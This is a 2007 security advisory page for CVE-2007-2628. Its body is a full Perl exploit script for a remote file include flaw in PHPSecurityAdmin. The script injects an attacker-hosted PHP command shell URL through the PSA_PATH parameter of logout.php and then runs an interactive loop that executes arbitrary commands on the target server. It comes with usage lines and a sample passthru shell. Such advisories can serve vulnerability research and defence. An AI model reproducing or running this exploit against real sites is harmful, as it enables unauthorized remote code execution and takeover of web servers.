SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

PHPSecurityAdmin Remote File Include Exploit


Arrow  SecurityAlert : 2693
Arrow  CVE : CVE-2007-2628
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : iLker Kandemir
Arrow  Published : 17.05.2007

Arrow  Affected Software : PHPSecurityAdmin



Arrow  Advisory Text :  

#!/usr/bin/perl
use LWP::UserAgent;
#/*
#+**************************************************************
#- AYYILDIZ TEAM // AYYILDIZ.ORG
#+
#+**************************************************************
#+
#- PHPSecurityAdmin <= Remote File Include Exploit
#+
#+**************************************************************
#+
#- [Script name: PHPSecurityAdmin
#- [Script site: http://sourceforge.net/projects/phpsecurityadm/
#+
#+**************************************************************
#+
#- Coded by iLker Kandemir
#+
#- Contact: ilkerkandemir<at>mynet<dot>com
#-
#- info: */ Siz Yokken AYYILDIZ Vardi */
#+
#+**************************************************************
#+
#- tnx: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann And AYYILDIZ.ORG
#-
#- h0tturk.com, expw0rm.com, turkistiklal.com, evilc0der.com
#!
#+
#+**************************************************************
# usage:
# perl exploit.pl <PSA Locaction> <shell location> <shell cmd>
#
# perl exploit.pl http://site.com/[PSA_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
#
$ayt = $ARGV[0];

$aytcmd = $ARGV[1];

$kumanda = $ARGV[2];

if($ayt!~/http:/// || $aytcmd!~/http:/// || !$kumanda){usage()}

head();

while()
{
print "[shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET=>$ayt.
'/phpsecurityadmin/include/logout.php?PSA_PATH='.$aytcmd.'?&'.$kumanda.'
='.$cmd)or die "nCouldNot connectn";
$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[n]/[&#234;]/;

if (!$cmd) {print "nEnter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot executea blank command in <b>/)

{print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit}

elsif ($return =~/^<br./>.<b>Warning/) {print "nInvalid Commandnn"}

if($return =~ /(.+)<br./>.<b>Warning.(.+)<br./>.<b>Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[&#234;]/[n]/;
print "rn$finreturnnr";
last;

}
else {print "[shell] $";}}}last;

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
print "+ AYYILDIZ TEAM // AYYILDIZ.ORG
+n";
print "+ PHPSecurityAdmin <= Remote File Include Exploit +n";
print "+ AYYILDIZ.ORG
+n";
print "+ iLker Kandemir [ O Bir Dunya Markasi ]
+n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <PSA Locaction> <shell location> <shell
cmd>rnn";
print " <PSA Locaction> - Full path to PSA ex:
http://www.xxx-site.com/rn";
print " <shell location> - Path to cmd Shell e.g
http://www.xxx-host.com/cmd.txtrn";
print " <shell cmd> - Command variable used in php shell rn";
print "
========================================================================
====rn";
print " Find by: iLker Kandemir
rn";
print " ilkerkandemir (at) mynet (dot) com [email
concealed] rn";
print " Thnx:h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann
rn";
print "
========================================================================
====rn";

exit();
}




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.